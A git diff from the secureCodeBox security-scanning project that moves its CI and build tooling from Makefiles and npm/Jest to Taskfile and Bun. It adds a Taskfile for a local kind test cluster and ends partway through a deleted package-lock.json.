diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs index 110f7436f2..a9de4d7ac9 100644 --- a/.git-blame-ignore-revs +++ b/.git-blame-ignore-revs @@ -13,4 +13,8 @@ # Applied megalinter automatic fixes 992174c1fb24a0808ee2894dfff22e568af2b589 # prettier reformatting of the notification hook -3f033b5c73a087f474f1f22c5091dc5b096bfadd \ No newline at end of file +3f033b5c73a087f474f1f22c5091dc5b096bfadd +# prettier reformatting of most scanner / parser files +5f61e5c9f128e405c5335ab08cd4cd4ad43675d9 +# prettier reformatting of most hook files +a5675d62fbb732a10cc36276a4bc8eda96e47c33 diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index c11aafb4e6..23206c5f10 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -23,6 +23,7 @@ env: KIND_BINARY_VERSION: "v0.27.0" HELM_VERSION: "v3.17.3" HELM_PLUGIN_UNITTEST: "0.5.1" + TASK_VERSION: "v3.44.0" jobs: test-nodejs-scanner-test-helpers: @@ -31,20 +32,18 @@ jobs: steps: - uses: actions/checkout@v4 - - uses: actions/setup-node@v4 - with: - node-version-file: ".nvmrc" + - name: Install bun + uses: oven-sh/setup-bun@v2 - name: Install dependencies working-directory: tests/integration - run: | - npm ci + run: bun install + - name: Test Node.js Scanner Test Helpers working-directory: tests/integration - run: | - npm run test:helpers + run: bun test helpers.test.js k8s-setup: - name: "Setup Kind & Kubectl & Helm" + name: "Setup Kind & Kubectl & Helm & Task" runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 @@ -64,6 +63,12 @@ jobs: curl -Lo ./helm.tar.gz https://get.helm.sh/helm-${{ env.HELM_VERSION }}-linux-amd64.tar.gz tar -xzf ./helm.tar.gz chmod +x ./linux-amd64/helm + + - name: Install Task + run: | + curl -Lo ./task.tar.gz https://github.com/go-task/task/releases/download/${{ env.TASK_VERSION }}/task_linux_amd64.tar.gz + tar -xzf ./task.tar.gz + chmod +x ./task - name: Archive Kind uses: actions/upload-artifact@v4 @@ -82,6 +87,12 @@ jobs: with: name: helm path: ./linux-amd64/helm + + - name: Archive Task + uses: actions/upload-artifact@v4 + with: + name: task + path: ./task # ---- Unit-Test ---- @@ -112,29 +123,18 @@ jobs: run: | helm plugin install https://github.com/helm-unittest/helm-unittest.git --version ${{ env.HELM_PLUGIN_UNITTEST }} - - name: Helm-Chart Unit Tests | Operator - working-directory: ./operator - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | AutoDiscovery Cloud AWS - working-directory: ./auto-discovery/cloud-aws - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | AutoDiscovery Kubernetes - working-directory: ./auto-discovery/kubernetes - run: make helm-unit-tests - - - name: Helm-Chart Unit Tests | Hooks - working-directory: ./hooks - run: make helm-unit-tests + - name: Download Task + uses: actions/download-artifact@v4 + with: + name: task + path: ./task - - name: Helm-Chart Unit Tests | Scanners - working-directory: ./scanners - run: make helm-unit-tests + - name: Make Task globally available + run: | + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - - name: Helm-Chart Unit Tests | Demo-Targets - working-directory: ./demo-targets - run: make helm-unit-tests + - name: Helm-Chart Unit Tests + run: task test:helm:all unit-java: name: "Unit-Test | Java" @@ -408,7 +408,7 @@ jobs: # ---- Test | Scanners ---- test-scanners: - name: "Test | Scanner ${{ matrix.unit }}" + name: "Test | Scanner ${{ matrix.unit }}" needs: - sdk - operator @@ -441,9 +441,18 @@ jobs: - name: Checkout uses: actions/checkout@v4 - - uses: actions/setup-node@v4 + - name: Install bun + uses: oven-sh/setup-bun@v2 + + - name: Download Task + uses: actions/download-artifact@v4 with: - node-version-file: ".nvmrc" + name: task + path: ./task + + - name: Make Task globally available + run: | + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - name: Download Kind uses: actions/download-artifact@v4 @@ -475,13 +484,9 @@ jobs: kubectl version || true helm version - - name: Install Dependencies - working-directory: ./scanners/${{ matrix.unit }}/ - run: make install-deps - - name: Unit Tests working-directory: ./scanners/${{ matrix.unit }}/ - run: make unit-tests + run: task test:unit - name: Download Parser SDK Image uses: actions/download-artifact@v4 @@ -494,60 +499,46 @@ jobs: docker load --input /tmp/parser-sdk.tar docker images | grep sdk - - name: Build Images - working-directory: ./scanners/${{ matrix.unit }}/ - run: make docker-build - - - name: Export Docker Images - working-directory: ./scanners/${{ matrix.unit }}/ - run: make docker-export - - - name: "Start kind cluster" - run: | - kind version - kind create cluster --wait 3m --image "$KIND_NODE_IMAGE" - - - name: "Inspect kind cluster" - run: | - kubectl config current-context - kubectl get node - - name: Download Operator Image uses: actions/download-artifact@v4 with: name: operator-image path: ./operator + - name: Load Operator Image + run: | + docker load --input ./operator/operator.tar + docker images | grep operator + - name: Download Lurker Image uses: actions/download-artifact@v4 with: name: lurker-image path: ./operator - - name: Import Operator & Lurker Image to kind cluster - working-directory: ./operator - run: make kind-import - - - name: Kind Import ${{ matrix.unit }} Image to kind cluster - working-directory: ./scanners/${{ matrix.unit }}/ - run: make kind-import + - name: Load Lurker Image + run: | + docker load --input ./operator/lurker.tar + docker images | grep lurker - - name: Deploy Operator Chart to kind cluster - working-directory: ./operator + - name: "Start kind cluster" run: | - make helm-deploy + task prepare-testing-env - - name: Deploy ${{ matrix.unit }} Chart to kind cluster + - name: ${{ matrix.unit }} Build Scanner / Parser Images working-directory: ./scanners/${{ matrix.unit }}/ - run: make deploy + run: task build - - name: Deploy Test Dependencies + - name: ${{ matrix.unit }} Load and Deploy Scanner / Parser Images to kind Cluster working-directory: ./scanners/${{ matrix.unit }}/ - run: make deploy-test-deps + run: task deploy - name: Start Integration Tests - working-directory: ./scanners/${{ matrix.unit }}/ - run: make integration-tests + uses: nick-fields/retry@ce71cc2ab81d554ebbe88c79ab5975992d79ba08 # v3.0.2 + with: + timeout_minutes: 15 + max_attempts: 3 + command: cd ./scanners/${{ matrix.unit }}/ && task test:integration # ---- Debuging Cluster on Failure ---- @@ -582,100 +573,39 @@ jobs: test-hooks: name: Test | Hook ${{ matrix.hook }} needs: + - sdk - operator - k8s-setup runs-on: ubuntu-22.04 strategy: + fail-fast: false matrix: hook: - cascading-scans - generic-webhook - persistence-azure-monitor - # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 + - persistence-elastic - persistence-dependencytrack - update-field-hook - finding-post-processing - notification # - persistence-static-report (WIP) steps: - - uses: actions/checkout@master - - - uses: actions/setup-node@v4 - with: - node-version-file: ".nvmrc" - - - name: "Start kind cluster" - run: | - kind version - kind create cluster --wait 3m --image "$KIND_NODE_IMAGE" - - name: "Inspect kind cluster" - run: | - kubectl config current-context - kubectl get node - - # ---- Install Operator & Create Namespaces ---- - - - name: Download Operator Image - uses: actions/download-artifact@v4 - with: - name: operator-image - path: ./operator - - - name: Download Lurker Image - uses: actions/download-artifact@v4 - with: - name: lurker-image - path: ./operator - - - name: Import Operator & Lurker Image - working-directory: ./operator - run: make kind-import - - - name: "Install Operator" - working-directory: ./operator - run: make helm-deploy - - # ---- Operator Health Check ---- - - - name: "Inspect Operator" - run: | - echo "Deployment in namespace 'securecodebox-system'" - kubectl -n securecodebox-system get deployments - echo "Pods in namespace 'securecodebox-system'" - kubectl -n securecodebox-system get pods - echo "Operator Startup Logs" - kubectl -n securecodebox-system logs deployment/securecodebox-controller-manager - - - name: "Create 'demo-targets' namespace" - run: "kubectl create namespace demo-targets" - - # ---- Import Parser SDK Artifact - - - name: Download Parser SDK Image - uses: actions/download-artifact@v4 - with: - name: parser-sdk-image - path: /tmp - - - name: Load Parser SDK Image - run: | - docker load --input /tmp/parser-sdk.tar - docker images | grep sdk + - name: Checkout + uses: actions/checkout@v4 - # ---- Import Hook SDK Artifact + - name: Install bun + uses: oven-sh/setup-bun@v2 - - name: Download Hook SDK Image + - name: Download Task uses: actions/download-artifact@v4 with: - name: hook-sdk-image - path: /tmp + name: task + path: ./task - - name: Load Parser SDK Image + - name: Make Task globally available run: | - docker load --input /tmp/hook-sdk.tar - docker images | grep sdk - - # ---- K8s Cluster Setup ---- # + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - name: Download Kind uses: actions/download-artifact@v4 @@ -707,61 +637,61 @@ jobs: kubectl version || true helm version - # ----- Build Test-Scan ScanType Image ---- - - - name: Build Images - working-directory: ./scanners/test-scan/ - run: make docker-build - - - name: Export Docker Images - working-directory: ./scanners/test-scan/ - run: make docker-export - - - name: Kind import - working-directory: ./scanners/test-scan/ - run: make kind-import - - - name: Test-scan deploy - working-directory: ./scanners/test-scan/ - run: make deploy - - # ----- Build Hook Image ---- + - name: Unit Tests + working-directory: ./hooks/${{ matrix.hook }}/ + run: task test:unit - - name: Build Images - working-directory: ./hooks/${{ matrix.hook }} - run: make docker-build + - name: Download Parser SDK Image + uses: actions/download-artifact@v4 + with: + name: hook-sdk-image + path: /tmp - - name: Export Docker Images - working-directory: ./hooks/${{ matrix.hook }} - run: make docker-export + - name: Load Hook SDK Image + run: | + docker load --input /tmp/hook-sdk.tar + docker images | grep sdk - - name: Kind import - working-directory: ./hooks/${{ matrix.hook }} - run: make kind-import + - name: Download Operator Image + uses: actions/download-artifact@v4 + with: + name: operator-image + path: ./operator - - name: "Install Test Dependencies" - working-directory: ./hooks - run: npm ci + - name: Load Operator Image + run: | + docker load --input ./operator/operator.tar + docker images | grep operator - # ---- Unit-Test ---- + - name: Download Lurker Image + uses: actions/download-artifact@v4 + with: + name: lurker-image + path: ./operator - - name: "Run Unit Tests" - working-directory: ./hooks/${{ matrix.hook }} - run: make unit-tests + - name: Load Lurker Image + run: | + docker load --input ./operator/lurker.tar + docker images | grep lurker - # ---- Integration-Test ---- + - name: "Start kind cluster" + run: | + task prepare-testing-env - - name: Deploy ${{ matrix.hook }} - working-directory: ./hooks/${{ matrix.hook }} - run: make deploy + - name: ${{ matrix.hook }} Build Scanner / Parser Images + working-directory: ./hooks/${{ matrix.hook }}/ + run: task build - - name: Deploy Test Dependencies - working-directory: ./hooks/${{ matrix.hook }} - run: make deploy-test-deps + - name: ${{ matrix.hook }} Load and Deploy Scanner / Parser Images to kind Cluster + working-directory: ./hooks/${{ matrix.hook }}/ + run: task deploy - - name: "Run Integration Test" - working-directory: ./hooks/${{ matrix.hook }} - run: make integration-tests + - name: Start Integration Tests + uses: nick-fields/retry@ce71cc2ab81d554ebbe88c79ab5975992d79ba08 # v3.0.2 + with: + timeout_minutes: 15 + max_attempts: 3 + command: cd ./hooks/${{ matrix.hook }}/ && task test:integration # ---- Debuging Cluster on Failure ---- @@ -791,26 +721,6 @@ jobs: echo "Operator Startup Logs" kubectl -n securecodebox-system logs deployment/securecodebox-controller-manager - - name: Test-scan integration-tests - working-directory: ./scanners/test-scan/ - run: | - helm -n integration-tests upgrade --install test-scan . \ - --set="scanner.image.repository=docker.io/securecodebox/scanner-test-scan" \ - --set="parser.image.repository=docker.io/securecodebox/parser-test-scan" \ - --set="parser.image.tag=sha-$(git rev-parse --short HEAD)" \ - --set="scanner.image.tag=sha-$(git rev-parse --short HEAD)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="parser.env[1].name=PRODUCE_INVALID_FINDINGS" \ - --set-string="parser.env[1].value=true" - make integration-tests - - # ---- Clean UP ---- - - - name: "Delete kind cluster" - run: | - kind delete cluster - sbctcl-tests: name: "Run sbctcl Tests" runs-on: ubuntu-22.04 diff --git a/.gitignore b/.gitignore index 319b8baa31..5fb27ddee0 100644 --- a/.gitignore +++ b/.gitignore @@ -71,3 +71,6 @@ documentation/static/findings documentation/.author_meta **/node_modules/ + +# we still use package-lock.json from node as we still use node for our acutal production containers +bun.lock \ No newline at end of file diff --git a/.templates/new-scanner/Makefile b/.templates/new-scanner/Makefile deleted file mode 100644 index e070cd36ac..0000000000 --- a/.templates/new-scanner/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = new-scanner -custom_scanner = set - -include ../../scanners.mk diff --git a/.templates/new-scanner/Taskfile.yaml b/.templates/new-scanner/Taskfile.yaml new file mode 100644 index 0000000000..9944d77f99 --- /dev/null +++ b/.templates/new-scanner/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: new-scanner + +tasks: {} diff --git a/.templates/new-scanner/integration-tests/jest.config.json b/.templates/new-scanner/integration-tests/jest.config.json deleted file mode 100644 index 0967ef424b..0000000000 --- a/.templates/new-scanner/integration-tests/jest.config.json +++ /dev/null @@ -1 +0,0 @@ -{} diff --git a/.templates/new-scanner/integration-tests/new-scanner.test.js b/.templates/new-scanner/integration-tests/new-scanner.test.js index 4136ea1e92..c4b5e36811 100644 --- a/.templates/new-scanner/integration-tests/new-scanner.test.js +++ b/.templates/new-scanner/integration-tests/new-scanner.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost scan should find at least one finding", @@ -13,28 +11,31 @@ test( "new-scanner-localhost", "new-scanner", ["localhost"], - 90 + 90, ); - // TODO: Implement at least one scanner specific integration test + // TODO: Implement at least one scanner specific integration test expect(count).toBeGreaterThanOrEqual(1); - expect(severities).toMatchInlineSnapshot(` - Object { - "INFORMATIONAL": 1, - } - `); + expect(severities).toMatchObject({ + informational: 1, + }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( "invalid scan parameters should be marked as errored", async () => { await expect( - scan("new-scanner-localhost", "new-scanner", ["-invalidFlag", "localhost"], 90) + scan( + "new-scanner-localhost", + "new-scanner", + ["-invalidFlag", "localhost"], + 90, + ), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/.templates/new-scanner/parser/parser.js b/.templates/new-scanner/parser/parser.js index 5503ac7763..b60edbf2cd 100644 --- a/.templates/new-scanner/parser/parser.js +++ b/.templates/new-scanner/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { const targets = parseResultFile(fileContent); return transformToFindings(targets); } @@ -29,5 +29,3 @@ function parseResultFile(fileContent) { } return targetList; } - -module.exports.parse = parse; diff --git a/.templates/new-scanner/parser/parser.test.js b/.templates/new-scanner/parser/parser.test.js index f7eb66cc09..f747350079 100644 --- a/.templates/new-scanner/parser/parser.test.js +++ b/.templates/new-scanner/parser/parser.test.js @@ -2,18 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const util = require("util"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); - -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse new-scanner json file", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/example.com.json", { + await readFile(import.meta.dirname + "/__testFiles__/example.com.json", { encoding: "utf8", }) ); @@ -25,7 +21,7 @@ test("should properly parse new-scanner json file", async () => { test("should properly parse empty json file", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty.json", { + await readFile(import.meta.dirname + "/__testFiles__/empty.json", { encoding: "utf8", }) ); diff --git a/Taskfile.yaml b/Taskfile.yaml new file mode 100644 index 0000000000..fe4fc68f80 --- /dev/null +++ b/Taskfile.yaml @@ -0,0 +1,110 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +env: + IMG_NS: securecodebox + IMG_TAG: + sh: 'echo "sha-$(git rev-parse --short HEAD)"' + +tasks: + create-kind-cluster: + cmds: + - 'echo "Starting kind cluster for testing environment"' + - kind create cluster --name testing-env + status: + - kind get clusters | grep testing-env || exit 1 + + build-operator-image: + cmds: + - 'echo "Building operator image with tag ${IMG_TAG}"' + - docker build -t ${IMG_NS}/operator:${IMG_TAG} {{ .TASKFILE_DIR }}/operator + status: + - docker images | grep "${IMG_NS}/operator" | grep "${IMG_TAG}" + + build-lurker-image: + cmds: + - 'echo "Building lurker image with tag ${IMG_TAG}"' + - docker build -t ${IMG_NS}/lurker:${IMG_TAG} {{ .TASKFILE_DIR }}/lurker + status: + - docker images | grep "${IMG_NS}/lurker" | grep "${IMG_TAG}" + + load-operator-image: + deps: [build-operator-image] + cmds: + - kind load docker-image ${IMG_NS}/operator:${IMG_TAG} --name testing-env + status: + - kind get images --name testing-env | grep "${IMG_NS}/operator:${IMG_TAG}" || exit 1 + + load-lurker-image: + deps: [build-lurker-image] + cmds: + - kind load docker-image ${IMG_NS}/lurker:${IMG_TAG} --name testing-env + status: + - kind get images --name testing-env | grep "${IMG_NS}/lurker:${IMG_TAG}" || exit 1 + + deploy-operator: + deps: [load-operator-image, load-lurker-image] + cmds: + - 'echo "Deploying secureCodeBox operator to the testing environment"' + - kubectl config use-context kind-testing-env + - kubectl create namespace integration-tests || true + - | + helm -n securecodebox-system upgrade --create-namespace --install securecodebox-operator {{ .TASKFILE_DIR }}/operator --wait \ + --set="image.repository=docker.io/${IMG_NS}/operator" \ + --set="image.tag=${IMG_TAG}" \ + --set="image.pullPolicy=IfNotPresent" \ + --set="lurker.image.repository=docker.io/${IMG_NS}/lurker" \ + --set="lurker.image.tag=${IMG_TAG}" \ + --set="lurker.image.pullPolicy=IfNotPresent" + status: + - kubectl get deployment -n securecodebox-system securecodebox-controller-manager | grep "1/1" || false + + build-parser-sdk-image: + cmds: + - 'echo "Building parser-sdk images with tag ${IMG_TAG}"' + - docker build -t securecodebox/parser-sdk-nodejs:${IMG_TAG} {{ .TASKFILE_DIR }}/parser-sdk/nodejs + status: + - docker images | grep "securecodebox/parser-sdk-nodejs" | grep "${IMG_TAG}" + + build-hook-sdk-image: + cmds: + - 'echo "Building hook-sdk images with tag ${IMG_TAG}"' + - docker build -t securecodebox/hook-sdk-nodejs:${IMG_TAG} {{ .TASKFILE_DIR }}/hook-sdk/nodejs + status: + - docker images | grep "securecodebox/hook-sdk-nodejs" | grep "${IMG_TAG}" + + prepare-testing-env: + desc: "Prepare the testing environment by running all required tasks" + cmds: + - task: create-kind-cluster + - task: deploy-operator + + cleanup-testing-env: + desc: "Cleanup the testing environment by deleting the kind cluster" + cmds: + - 'echo "Cleaning up testing environment"' + - kind delete cluster --name testing-env + + minio-port-forward: + desc: "Port forward the MinIO service to access it locally" + cmds: + - 'echo "Port forwarding MinIO service to localhost:9001"' + - 'echo "You can access MinIO at http://localhost:9001"' + - 'echo "Use the credentials from the secureCodeBox operator to log in:"' + - 'echo "Access Key: $(kubectl get secret -n securecodebox-system securecodebox-operator-minio -o jsonpath="{.data.root-user}" | base64 --decode)"' + - 'echo "Secret Key: $(kubectl get secret -n securecodebox-system securecodebox-operator-minio -o jsonpath="{.data.root-password}" | base64 --decode)"' + - 'echo "Press Ctrl+C to stop port forwarding"' + - kubectl port-forward -n securecodebox-system svc/securecodebox-operator-minio 9001:9001 + interactive: true + + test:helm:all: + cmds: + - | + find . -name "Chart.yaml" | while read -r chart_file; do + chart_dir=$(dirname "$chart_file") + echo "Running tests for helm chart: $chart_dir" + helm unittest $chart_dir + done diff --git a/auto-discovery/kubernetes/pull-secret-extractor/Makefile b/auto-discovery/kubernetes/pull-secret-extractor/Makefile index bce3246e94..2f2b2b0dbb 100644 --- a/auto-discovery/kubernetes/pull-secret-extractor/Makefile +++ b/auto-discovery/kubernetes/pull-secret-extractor/Makefile @@ -49,7 +49,7 @@ integration-test: docker-build docker-export kind-import ./integration-test/test-pod.sh ${IMG_NS}/${IMG}:${IMG_TAG} kubectl wait --for=condition=ready --timeout=60s -n integration-test pod/init-container-test - cd integration-test && npm ci && npm run test:integration + kubectl get secret --namespace integration-test test-secret ##@ Build diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json deleted file mode 100644 index d40ddfc16c..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json +++ /dev/null @@ -1,10363 +0,0 @@ -{ - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1" - } - }, - "node_modules/@aashutoshrathi/word-wrap": { - "version": "1.2.6", - "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", - "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.26.0" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": 